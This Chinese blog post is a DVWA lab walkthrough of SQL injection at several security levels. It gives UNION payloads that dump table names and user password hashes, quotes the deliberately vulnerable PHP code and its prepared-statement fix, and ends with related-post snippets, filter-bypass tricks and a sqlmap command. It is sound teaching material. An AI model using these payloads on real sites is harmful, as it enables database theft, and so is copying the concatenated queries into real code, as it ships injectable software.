DVWA学习(一)SQL Injection

最新推荐文章于 2025-07-10 14:56:54 发布
最新推荐文章于 2025-07-10 14:56:54 发布
阅读量1.2k 收藏 4
点赞数 1
CC 4.0 BY-SA版权
分类专栏: Web安全 文章标签: sql注入 dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yusakul/article/details/84301771
本文深入解析SQL注入攻击,包括其工作原理、攻击分类及在不同安全级别下的实施方法。从低级到高级,展示了如何利用SQL语法漏洞获取敏感信息。

本文参考自https://www.jianshu.com/u/9dac23b54fba,根据自己的学习进度可能会有不同的地方,详细可以查看原文链接。

SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。
DVWA安全级别:LOW
  • 输入1:
    在这里插入图片描述
    • 输入1’:
      在这里插入图片描述
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
    可以知道这里的ID是单引号闭合。

(关于sql注入语句闭合的一些见解: https://blog.youkuaiyun.com/qiutyu/article/details/80314929)
一般的代码:id=_GET[‘id’];
sql=“SELECT * FROM users WHERE id=‘id’ LIMIT 0,1”;
就是这里,对id进行了修饰,用’(单引号)把id括了起来。所以我们构造语句的时候,一是要把我们构造的语句‘逃逸’出来,二是要把结构进行补全或者适当的注释。

  • 输入1’ or 1='1,显示了所有姓名和ID,可以知道是用了while循环显示(代入到id='id’中为id=‘1’ or 1=‘1’ )。url为http://127.0.0.1/vulnerabilities/sqli/?id=1%27+or+1%3D%271&Submit=Submit#
    在这里插入图片描述

  • 获取字段长

    1’ union select 1-- k报错:SELECT语句中使用具有不同数目的列。说明表的字段数不为1。
    The used SELECT statements have a different number of columns

    1’ union select 1,2-- k正常显示,1,2号位也正常显示出来

    在这里插入图片描述
    url为http://127.0.0.1/vulnerabilities/sqli/?id=1%27+union+select+1%2C2--+k&Submit=Submit#

  • 显示数据库名

    1’ union select 1,database()-- k,2号位显示数据库名为dvwa。

    在这里插入图片描述
    url为http://127.0.0.1/vulnerabilities/sqli/?id=1%27+union+select+1%2Cdatabase%28%29--+k&Submit=Submit#

  • 爆表:

    1’ union select 1,group_concat(0x3e,table_name) from information_schema.tables where table_schema=‘dvwa’ – k

    在这里插入图片描述

  • 爆列:

    1’ union select 1,group_concat(0x3e,column_name) from information_schema.columns where table_schema=‘dvwa’ – k

    在这里插入图片描述

  • 爆出所有用户名和密码,根据之前爆表获取到的表明users,以及爆列获取到的列名user, password。

    0’ union select user, password from users – k

    在这里插入图片描述

low.php源码,没有任何过滤,最基本的SQL注入。


if( isset( $_REQUEST[ 'Submit' ] ) ) {
	// Get input
	$id = $_REQUEST[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

	mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>
Medium级别

输入框变成了下拉框
在这里插入图片描述

可以查看元素知道name=id,post表单,可以用burp抓包改id或者用hackbar。
在这里插入图片描述
在这里插入图片描述

使用HackBar插件,选择POST发送方式,id=1’发现单引号被转义了,执行无效。
在这里插入图片描述

id=1 or 1=1&Submit=Submit显示所有ID和姓名,可以判断是数字型。
在这里插入图片描述

注入的分类
注入的分类:数字型和字符型。攻击者目的只有一点,那就是绕过程序的限制,使用户输入的数据带入数据库执行,利用数据库的特殊性获取更多的信息或者更大的权限。
1、数字型注入
当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。
2、字符型注入
当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

其余方法和LOW难度一样
在这里插入图片描述
medium.php源码:


if( isset( $_POST[ 'Submit' ] ) ) {
	// Get input
	$id = $_POST[ 'id' ];

	$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

	$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Display values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>
High难度

变成了在另外一个窗口提交ID到该页面,是字符型注入。
在这里插入图片描述

在这里插入图片描述
其余步骤和上面差不多
High级别的查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,这样做的目的是为了防止一般的sqlmap注入,因为sqlmap在注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,也就没办法进一步注入。
High.php源码:

if( isset( $_SESSION [ 'id' ] ) ) {
	// Get input
	$id = $_SESSION[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);		
}
?>

与Medium难度相比High难度没有转义函数,在SQL语句后面添加了一个limit,限制输出结果为1条。虽然添加了LIMIT 1,但是我们可以通过#将其注释掉。

安全级别: Impossible

源码:


if( isset( $_GET[ 'Submit' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$id = $_GET[ 'id' ];

	// Was a number entered?
	if(is_numeric( $id )) {
		// Check the database
		$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
		$data->bindParam( ':id', $id, PDO::PARAM_INT );
		$data->execute();
		$row = $data->fetch();

		// Make sure only 1 result is returned
		if( $data->rowCount() == 1 ) {
			// Get values
			$first = $row[ 'first_name' ];
			$last  = $row[ 'last_name' ];

			// Feedback for end user
			$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
		}
	}
}

// Generate Anti-CSRF token
generateSessionToken();

?>

添加了token机制,防止CSRF攻击。
SQL语句使用
PDO机制预处理语句
PHP PDO 预处理语句与存储过程
原理:两次传输,前一次传一个sql模板,第二次传查询参数,会把第二步传入的参数只做查询参数处理,不做语义解释,这样注入的条件就算执行了,也不会得到查询结果。
划清了代码与数据的界限,可以确保不会发生SQL 注入。(然而,如果查询的其他部分是由未转义的输入来构建的,则仍存在 SQL 注入的风险)。

DVWASQL Injection
小小郭的博客
01-10 302
根据自己的知识积累进行手工注入测试,若有说的不恰当的地方,还望指正~ 、LOW等级 输入框输入单引号’,报错 证明有SQL注入 ‘ union select 1,2 # 可以看哪些数据可以回显 如果跟能回显的数据量不样,则报错 查看所有数据库名称,'union select 1,group_concat(schema_name) from information_schema.schemata # 查看当前数据库 ,’ union select 1,database().
DVWAsql注入SQL Injection
qq_54537919的博客
06-25 874
DVWAsql注入SQL Injection)全等级low、medium、high
DVWA系列】——SQL注入(布尔盲注)详细教程
2402_84408069的博客
07-10 1088
本文详细介绍了DVWA SQL布尔盲注(Blind SQL Injection)在Low级别的实战方法。通过分析漏洞原理,展示了手工注入的核心步骤:判断注入类型、猜解数据库名长度、逐字符猜解数据库名、表名及列名数据。文章提供了详细Payload和二分法等高效技巧,同时推荐使用sqlmap等工具加速渗透测试。最后强调了防御措施的重要性,包括参数化查询和输入过滤。附有免责声明,强调仅限合法授权下的安全研究。
DVWASQL注入
m0_67403013的博客
08-01 341
DVWA款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWASQL Injection
鸣蜩十四的博客
06-21 298
SQL Injection: 绕过空格(注释符/* */,%a0) 括号绕过空格 引号绕过(使用十六进制) %df%5c%27 逗号绕过(使用from或者offset) or and xor not绕过:and=&& or=|| xor=| not=! 绕过注释符号(#,--(后面跟个空格))过滤:id=1' union select 1,2,3||'1 =绕过: 使用like 、rlike 、regexp 或者 使用< 或者 > 绕过union,select,wh...
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
weixin_43850721的博客
12-14 3146
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
DVWA靶场-SQL Injection (Blind)SQL注入盲注
mlws1900的博客
03-19 1778
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+盲注,与注入的区别在于,般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比注入高。length:正整数,指定将从左边返回的字符数。
DVWA靶场-SQL InjectionSQL注入
mlws1900的博客
03-18 711
就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。函数用于对用户输入的id进行转义,以防止恶意SQL代码被插入到SQL查询语句中。通过使用这个函数,特殊字符(如单引号)将被转义,从而使输入的数据变得安全,并且不会破坏SQL查询语句的结构。
DVWASQL Injection通关(低中高)
LIU6636LIU的博客
07-15 1110
DVWASQL Injection通关(低中高)
DVWA下的SQL Injection(Blind)
07-25
盲注
dvwasql injection
Alsn86的博客
01-18 329
dvwasql injection low,php,没有任何过滤,把sql搜索到的所有记录都输出来 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $html .=$query;//自
SQL injection
weixin_30765319的博客
08-02 115
最近自己折腾个数据库的东西,自己研究了SQL injection. SQL injection 看起来还是挺有意思。可以看看youtube 上的SQL injection的实例还是比较简单的。http://www.youtube.com/watch?v=MJNJjh4jORY 当然这是最基本的SQL injection了。这种最基本的问题般都出在query的字段连接上...
DVWA-SQL Injection
qq_45751902的博客
04-25 256
目录简介sql注入漏洞原理SQL注入漏洞类型危害安全级别:Low查看源码源码分析数据库名表名列名字段值安全级别:Medium查看源码源码分析数据库名表名列名字段值安全级别:High查看源码源码分析闭合符号为`’`判断列数数据库名表名列名数据安全级别:Impossible查看源码源码分析防护总结 简介 sql注入漏洞原理 将恶意的SQL语句拼接到合法的语句中,从而达到执行SQL语句的目的; SQL注入漏洞类型 字符型; 数字型; 搜索型; 危害 攻击者未经授权可以访问数据库中的数据,盗取用户的隐私
SQL Injection
weixin_34175509的博客
06-20 249
Low级别 判断是否存在注入点 输入1提交 输入1 and 1=1提交 SELECT first_name, last_name FROM users WHERE user_id = '1' 输入1 and 1=2提交 由上可以看出是存在注入点的,参数为id SELECT first_name, last_name FROM users WHERE u...
sql injection(sql 注入)
逍遥绝情的博客
05-24 3857
前言当个攻击者通过在查询语句中插入系列的SQL语句来将数据写入到应用程序中,这种方法就可以定义成SQL注入SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 SQL注入是从正常的WWW端口访问,而且表面看起来跟般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没
DVWASQL Injection
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
12-05 2084
圣人之道,吾性自足,不假外求
DVWA SQLinjection怎么用
最新发布
07-31
<think>我们正在讨论DVWA中的SQL注入攻击。根据用户提供的引用,特别是引用[1]和[2],我们知道DVWASQL注入关卡分为不同安全级别(LOW, MEDIUM, HIGH, IMPOSSIBLE),并且攻击方法包括UNION注入ERROR注入(针对非盲注)以及BOOLEAN盲注(针对盲注)。同时,引用[3]和[4]提到了些防御措施,比如限制查询结果数量(LIMIT 1)以及分离查询提交页面和结果页面来防御自动化工具(如sqlmap)。 用户要求了解DVWASQL注入攻击的步骤和原理详解。我们将按照以下结构进行回答: 1. SQL注入原理简介 2. DVWA SQL Injection(非盲注)攻击步骤(针对LOW, MEDIUM, HIGH级别) 3. DVWA SQL Injection (Blind)(盲注)攻击步骤(针对LOW, MEDIUM, HIGH级别) 4. 防御措施分析(IMPOSSIBLE级别) 注意:在描述攻击步骤时,我们将结合引用[2]中的示例(获取dvwa数据库的所有表名)以及其他常见的注入技术。 由于引用中提到了使用手工注入sqlmap,但TIME注入耗时太久未采用,因此我们将重点放在UNION注入ERROR注入和BOOLEAN盲注上。 开始回答:</think>### DVWA SQL注入攻击步骤与原理详解 DVWA(Damn Vulnerable Web Application)是款专为安全测试设计的漏洞演练平台。以下针对其SQL注入漏洞(非盲注/盲注)的攻击步骤与原理进行详解,结合LOW、MEDIUM、HIGH安全级别的实践方法,并引用相关技术点[^1][^2][^3][^4]。 --- #### **SQL注入原理** **核心漏洞**:攻击者通过篡改输入参数,破坏原始SQL语句结构,执行恶意查询。 **数学表达**: 设原始查询为: $$Q = \text{SELECT * FROM users WHERE id = } \color{red}{\text{'$input'}}$$ 当输入为 `1' UNION SELECT 1,table_name FROM information_schema.tables#` 时,实际执行语句变为: $$Q_{\text{malicious}} = \text{SELECT * FROM users WHERE id = '1' UNION SELECT 1,table_name FROM information_schema.tables#'}$$ 导致数据库返回敏感信息(如表名、字段值)。 --- #### **二、非盲注攻击步骤(SQL Injection)** 适用于页面直接返回查询结果的场景。 ##### **1. LOW级别** **漏洞点**:未过滤用户输入,直接拼接SQL语句[^1]。 **攻击步骤**: 1. **探测列数**(UNION注入前提): ```sql 1' ORDER BY 3# -- 尝试列数,直到报错(如ORDER BY 4报错则列数为3) ``` 2. **联合查询获取数据**(引用[2]示例): ```sql 1' UNION SELECT 1,table_name FROM information_schema.tables WHERE table_schema='dvwa'# ``` - `1` 为占位符,匹配原始查询列数 - `information_schema.tables` 为系统表,存储所有表名 - `table_schema='dvwa'` 限定目标数据库 ##### **2. MEDIUM级别** **漏洞点**:输入参数改为数字型(无引号),但未过滤[^3]。 **攻击步骤**: 1. **绕过数字型检测**: ```sql 1 UNION SELECT 1,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='dvwa'# ``` - 无需闭合引号,直接拼接UNION ##### **3. HIGH级别** **漏洞点**:分离查询与结果页面(防自动化工具),但未过滤输入[^4]。 **攻击步骤**: 1. **利用Burp Suite绕过页面分离**: - 拦截查询请求 → 修改参数为注入语句 → 转发获取响应 ```sql 1' UNION SELECT user,password FROM users# ``` - 通过结果页面查看敏感数据(如密码哈希值) --- #### **三、盲注攻击步骤(SQL Injection Blind)** 适用于页面无直接数据返回,但可通过布尔或时间差异判断结果。 ##### **1. BOOLEAN盲注(常用)** **原理**:根据页面返回内容差异(真/假)推断数据。 **攻击步骤**(以获取数据库名为例): 1. **判断数据库名长度**: ```sql 1' AND LENGTH(DATABASE())=4# -- 若页面返回正常,则库名长度为4 ``` 2. **逐字符猜解**: ```sql 1' AND SUBSTRING(DATABASE(),1,1)='d'# -- 验证首字母是否为'd' ``` - 使用 `SUBSTRING()` 或 `MID()` 函数截取字符 ##### **2. sqlmap自动化利用** **适用场景**:手工注入效率低时(如MEDIUM/HIGH级别)。 **命令示例**: ```bash sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \ --cookie="PHPSESSID=xxx; security=medium" \ --batch --dbs ``` - `--dbs`:列举所有数据库 - `--tables -D dvwa`:列举dvwa库的所有表 > **注意**:HIGH级别因页面分离需配合Burp抓包(`--proxy=http://127.0.0.1:8080`)[^4]。 --- #### **四、防御机制分析(IMPOSSIBLE级别)** **安全代码原理**: 1. **预处理语句(Prepared Statements)**: ```php $stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id"); $stmt->bindParam(':id', $id, PDO::PARAM_INT); // 强制类型为整数 ``` - 输入参数与SQL逻辑分离,杜绝拼接 2. **Token验证**: - 每次提交需携带CSRF Token,阻止自动化工具重放攻击[^3] --- ### 总结 | 安全级别 | 注入方式 | 关键技巧 | |----------|-------------------|-----------------------------------| | LOW | UNION/ERROR注入 | 闭合单引号,联合查询系统表[^2] | | MEDIUM | 数字型UNION注入 | 省去引号,直接UNION | | HIGH | 工具绕过+手工注入 | Burp Suite拦截修改请求[^4] | | IMPOSSIBLE | 防御生效 | 预处理语句+Token验证 | > 实践提示: > - 非盲注优先用UNION查询(高效) > - 盲注推荐BOOLEAN注入(避免耗时TIME注入)[^1] > - 遇到页面分离时,手动工具结合(Burp+sqlmap)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值